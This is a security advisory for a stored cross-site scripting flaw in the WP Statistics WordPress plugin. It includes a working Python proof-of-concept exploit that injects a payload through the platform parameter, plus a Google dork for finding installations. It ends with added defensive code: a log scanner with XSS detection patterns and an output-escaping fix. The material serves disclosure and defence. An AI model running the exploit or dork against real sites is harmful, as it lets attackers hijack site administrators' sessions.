Headline
CVE-2022-25307: WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform
The WP Statistics WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the platform parameter found in the ~/includes/class-wp-statistics-hits.php file, which allows attackers to inject arbitrary web scripts onto several pages that execute when site administrators view a site's statistics, in versions up to and including 13.1.5.
WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform
Exploit Title
WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting
Exploit Author
Muhammad Zeeshan (Xib3rR4dAr)
Date
February 13, 2022
Plugin Link
WP-Statistics
Plugin Active Installations
600,000+
Version
13.1.5 (Latest)
Tested on
WordPress 5.9
Vulnerable Endpoint
/wp-json/wp-statistics/v2/hit
Vulnerable File
/wp-content/plugins/wp-statistics/includes/class-wp-statistics-hits.php and others
Vulnerable Parameters
platform
Google Dork
inurl:/wp-content/plugins/wp-statistics
CVE
N/A
Proof of Concept
unauthenticated_stored_xss_platform_poc.py
import requests, re, json, urllib.parse
from random import randint

wpurl = input('\nWordPress URL: ')
payload = input('\nPayload: ')

# Fetch the site front page with a session; the plugin embeds its REST nonce in the page source
wp_session = requests.session()
wp = wp_session.get(wpurl)
wp_nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', wp.text).group(1)

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

# URL-encode the payload and build the hit request; the platform value is stored without sanitization
payload = urllib.parse.quote_plus(payload)
random_ip = '.'.join([str(randint(0, 255)) for x in range(4)])
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser=Chrome&platform={payload}&version=&referred=&ip={random_ip}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0'
exploit_url = wpurl + exploit

print(f'\nSending XSS payload: {exploit_url}')
wp = wp_session.get(exploit_url, headers=headers)
data = wp.json()
print("\nResponse: \n" + json.dumps(data, sort_keys=True, indent=4))
print(f'\nXSS will trigger when admin views platforms of visitors at {wpurl}/wp-admin/admin.php?page=wps_visitors_page or other pages')
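From the defender's side, the useful facts in this advisory are the endpoint (/wp-json/wp-statistics/v2/hit), the stored parameter (platform) and the root cause (no escaping when the value is rendered to administrators). The following Python is an added example, not part of the original advisory and not code from the WP Statistics plugin. It scans web-server access-log lines for hit requests whose platform-style parameters carry HTML or JavaScript markup, and shows the output-escaping step the plugin lacked. The log lines are constructed samples; the assumption that browser, version and ua are rendered alongside platform is mine and is marked in the code.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Feb/2022:10:00:01 +0000] "GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=abcd1234&wp_statistics_hit_rest=&browser=Chrome&platform=Windows&version=98&ip=203.0.113.10&page_uri=/ HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.11 - - [13/Feb/2022:10:00:02 +0000] "GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=abcd1234&wp_statistics_hit_rest=&browser=Chrome&platform=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&version=&ip=198.51.100.7&page_uri=/ HTTP/1.1" 200 45 "-" "Something"
203.0.113.12 - - [13/Feb/2022:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Endpoint named in the advisory.
HIT_ENDPOINT = "/wp-json/wp-statistics/v2/hit"

# The advisory identifies platform as the stored, unescaped parameter. Watching browser,
# version and ua as well is an assumption (they travel in the same request and are
# visitor-controlled), not something the advisory states.
WATCHED_PARAMS = ("platform", "browser", "version", "ua")

# Combined log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Markup that has no business in a platform name: tags, javascript: URLs, inline event handlers
MARKUP_RE = re.compile(r"<[^>]*>|javascript:|on\w+\s*=", re.IGNORECASE)


def suspicious_value(value: str) -> bool:
    """True when an already percent-decoded parameter value contains HTML/JS markup."""
    return MARKUP_RE.search(value) is not None


def scan_log(text: str) -> list[dict]:
    """Return one finding per watched parameter value that carries markup on the hit endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        parts = urlsplit(m.group("target"))
        if parts.path != HIT_ENDPOINT:
            continue
        # parse_qs percent-decodes values, so %3Cscript%3E arrives here as <script>
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                if suspicious_value(value):
                    findings.append(
                        {"ip": m.group("ip"), "ts": m.group("ts"), "param": name, "value": value}
                    )
    return findings


def render_platform(stored_value: str) -> str:
    """Escape a stored visitor-supplied value at output time, before it lands in admin HTML.

    This is the step the advisory says is missing: the value may stay raw in the database,
    but it must be HTML-escaped wherever it is rendered.
    """
    return html.escape(stored_value, quote=True)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} suspicious {f['param']}={f['value']!r}")
    print(render_platform("<script>alert(1)</script>"))
```

Run against real logs, the scanner only sees what the web server recorded in the request line, so it misses parameters sent in a POST body; for this endpoint the PoC uses a GET query string, which is what the pattern above keys on. The escape helper is the generic fix pattern (escape on output with the rendering context's encoder); in a WordPress plugin the equivalent is the core esc_html / esc_attr family.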